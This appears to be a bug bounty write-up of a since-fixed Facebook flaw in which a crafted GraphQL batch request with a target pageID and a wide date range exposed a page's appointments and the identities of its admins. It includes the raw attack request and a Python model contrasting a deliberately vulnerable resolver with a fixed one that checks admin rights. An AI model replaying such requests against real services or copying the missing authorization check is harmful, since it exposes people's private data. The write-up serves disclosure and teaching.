Disclose Page Admins via Facebook Appointments
🧾 Description
A vulnerability was discovered in Facebook's Pages product that allowed an attacker to read the appointment details of any Page, including the identity of its administrators. By sending a GraphQL batch request that named the target's pageID and a wide date range, an attacker who was not an admin of that page could enumerate every appointment it had created and identify the admins from the user who created each one.
⚙️ Steps to Reproduce
Victim Scenario
Victim (page admin of page_a) creates an appointment on their page.
Attacker Steps
The attacker sends a crafted GraphQL batch request (the `pageID` is the victim's page; the date range is made wide enough to cover every appointment):

```http
POST /api/graphqlbatch/ HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: close

&queries={"o0":{"doc_id":"1735616686561494","query_params":{"pageID":"ID_PAGE_A","startDate":1,"endDate":9999999999999999}}}
```
Response:
The API response contained the details of all appointments on the page, including the user who created each of them, i.e. the page admins.
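The following is an added illustration, not code from the original write-up or from Facebook: it builds the same form-encoded `queries` body shown above and then models the bug class behind the finding, a GraphQL resolver that trusts the `pageID` parameter without checking that the caller administers that page, next to the check that closes it. The page data, admin sets, response shape and the `Forbidden` error are constructed for the example; the real server-side code and response format are not known from the write-up.

```python
import json
from urllib.parse import urlencode, parse_qs

# doc_id taken from the request in the write-up; everything else below is constructed.
DOC_ID = "1735616686561494"


def build_queries_param(page_id, start=1, end=9999999999999999):
    """Return the form-encoded `queries=` body used in the batch request."""
    queries = {"o0": {"doc_id": DOC_ID,
                      "query_params": {"pageID": page_id,
                                       "startDate": start,
                                       "endDate": end}}}
    return urlencode({"queries": json.dumps(queries, separators=(",", ":"))})


def parse_queries_param(body):
    """Inverse of build_queries_param: decode the batch back into a dict."""
    return json.loads(parse_qs(body)["queries"][0])


# --- constructed server-side model (hypothetical, not Facebook's data model) ---
PAGE_ADMINS = {"page_a": {"user_111"}, "page_b": {"user_222"}}
APPOINTMENTS = {
    "page_a": [{"id": "appt_1", "creator": "user_111", "title": "Haircut"}],
    "page_b": [{"id": "appt_2", "creator": "user_222", "title": "Consult"}],
}


class Forbidden(Exception):
    """Raised when the requester is not allowed to read a page's appointments."""


def appointments_vulnerable(requester, page_id):
    """Pre-fix behaviour: pageID is taken from the query and the requester is never checked."""
    return APPOINTMENTS.get(page_id, [])


def appointments_fixed(requester, page_id):
    """Fixed behaviour: the requester must be an admin of the page named in the query."""
    if requester not in PAGE_ADMINS.get(page_id, set()):
        raise Forbidden(f"{requester} may not read appointments of {page_id}")
    return APPOINTMENTS.get(page_id, [])


def leaked_admins(appointments):
    """What an attacker extracts from the response: the creator (admin) user IDs."""
    return sorted({a["creator"] for a in appointments})


def handle_batch(body, requester, resolver):
    """Decode a batch body and dispatch each query to the given resolver."""
    out = {}
    for key, q in parse_queries_param(body).items():
        page_id = q["query_params"]["pageID"]
        try:
            out[key] = {"data": resolver(requester, page_id)}
        except Forbidden as e:
            out[key] = {"error": str(e)}
    return out


if __name__ == "__main__":
    body = build_queries_param("page_a")
    print(body)
    # An unrelated account gets page_a's admin out of the vulnerable resolver...
    print(handle_batch(body, "attacker", appointments_vulnerable))
    # ...and an error out of the fixed one; the real admin still succeeds.
    print(handle_batch(body, "attacker", appointments_fixed))
    print(handle_batch(body, "user_111", appointments_fixed))
```

The point of the model is the authorization check: the `pageID` in `query_params` is attacker-controlled, so the resolver must verify the relationship between the authenticated requester and that page before returning anything, rather than assuming that whoever asks for a page's appointments is one of its admins.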
Impact
- Attackers could enumerate all appointments of any Facebook Page without being an admin of that page.
- The response leaked the user ID of the page administrator who created each appointment.
- This exposes who administers a page, which violates admin privacy and could lead to targeted attacks or profiling of those users.
Timeline
- Reported: October 12, 2018
- Triaged: October 15, 2018
- Fixed: October 17, 2018
- Reward: October 17, 2018, $2,000
This post is licensed under CC BY 4.0 by the author.